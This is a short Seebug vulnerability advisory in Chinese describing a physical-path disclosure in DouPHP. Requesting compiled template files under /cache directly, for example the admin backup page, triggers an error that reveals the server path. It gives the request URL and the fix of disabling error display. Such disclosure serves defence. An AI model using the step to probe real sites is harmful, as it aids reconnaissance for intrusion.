douphp /cache 目录物理路径泄漏

2016-01-28T00:00:00
ID SSV:90688
Type seebug
Reporter huakai
Modified 2016-01-28T00:00:00

Description

1. 漏洞分析

漏洞文件

cache目录下的所有文件

如:admin/backup.htm.php

php <?php /* Smarty version 2.6.26, created on 2016-01-21 21:22:24 compiled from backup.htm */ ?> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title><?php echo $this->_tpl_vars['lang']['home']; ?>//会引起报错

2. 漏洞利用

直接访问

http://www.douco.com/cache/admin/backup.htm.php

然后查看网页源码,泄漏物理路径

3. 漏洞修复

关闭错误信息显示